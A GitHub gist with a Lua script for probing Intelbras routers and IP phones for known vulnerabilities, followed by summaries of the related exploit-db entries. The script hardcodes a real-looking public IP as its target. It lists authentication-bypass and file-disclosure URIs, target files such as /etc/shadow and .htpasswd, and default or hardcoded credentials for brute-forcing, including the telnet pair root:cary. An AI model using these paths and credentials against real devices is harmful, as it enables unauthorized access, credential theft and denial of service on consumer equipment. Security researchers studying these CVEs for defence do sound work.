Created
September 6, 2019 06:25
-
-
Save MrCl0wnLab/2c325380cff786e0e1556c1fc8306098 to your computer and use it in GitHub Desktop.
Checke vulns Roteadores IntelBras
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- DEPENDENCIES (lua libraries) -- | |
local http = require("socket.http") | |
local string = require("string") | |
local os = require("os") | |
target = "http://191.17.73.234" | |
port = 8081; | |
uri_request_list = { | |
-- URI INTELBRAS | |
INTELBRAS_NCLOUD_300_1_0={ | |
URI="/cgi-bin/ExportSettings.sh",REQUEST_TYPE="POST",REQUEST_POST="Export=Salvar",AUTH=true,COOKIE=false | |
}, | |
INTELBRAS_Telefone_IP_TIP200_LITE={ | |
URI="/cgi-bin/cgiServer.exx?page=[EXPLOIT_FILE]",REQUEST_TYPE=false,REQUEST_POST=false,AUTH=true,COOKIE=false | |
}, | |
INTELBRAS_Wireless_N_150_Mbps_WRN_150={ | |
URI="/cgi-bin/DownloadCfg/RouterCfm.cfg",REQUEST_TYPE=false,REQUEST_POST=false,AUTH=true,COOKIE="admin:language=pt" | |
}, | |
INTELBRAS_TELEFONE_IP_TIP200_200_LITE_60_61_75_15={ | |
URI="/cgi-bin/cgiServer.exx?command=dumpConfigFile([EXPLOIT_FILE])",REQUEST_TYPE="POST",REQUEST_POST="Export=Salvar",AUTH=true,COOKIE=false | |
}, | |
INTELBRAS_IWR_3000N_Denial_of_Service={ | |
URI="/v1/system/login",REQUEST_TYPE=false,REQUEST_POST=false,AUTH=false,COOKIE=false | |
} | |
} | |
file_exploit_list = { | |
-- URI EXPLOIT | |
"/phone/factory/user.ini", | |
"/phone/config/WebItemsLevel.cfg", | |
"/phone/config/.htpasswd", | |
"/etc/passwd", | |
"/etc/shadow" | |
} | |
http_basic_auth = { | |
-- USER BRUTE FORCE | |
"admin:admin", | |
"root:cary", | |
"default:default", | |
"888888:888888", | |
"666666:666666", | |
"intelbras:intelbras" | |
} | |
for i, intable in pairs(uri_request_list) do | |
print(target..":"..port..intable.URI) | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read
Disclaimer:
This or previous programs are for Educational purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
caused by direct or indirect use of the information or functionality provided by these programs.
The author or any Internet provider bears NO responsibility for content or misuse of these programs
or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
responsibility.
Exploit Author: Todor Donev 2019 (c) todor.donev@gmail.com
FILE:
exploit:
http basic Auth
https://www.exploit-db.com/exploits/47337
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
FILE
exploit:
https://www.exploit-db.com/exploits/46768
Intelbras NCLOUD 300 1.0 - Authentication bypass
CVE : CVE-2018-11094
Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
The configurations backup file contains the web interface username and password.
Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist,
it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
to log into the device using telnet.
Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
FILE:
exploit:
http basic Auth (hba)
https://www.exploit-db.com/exploits/44637
Intelbras Telefone IP TIP200 LITE - Local File Disclosure
Exploit Author: [Matheus Goncalves - anhax0r]
exploit:
http basic Auth
https://www.exploit-db.com/exploits/44317
Intelbras Wireless N 150 Mbps - WRN 150
Autentication Bypass/Config file download - INTELBRAS WRN
Exploit Author: Elber Tavares
FILE
exploit:
https://www.exploit-db.com/exploits/42916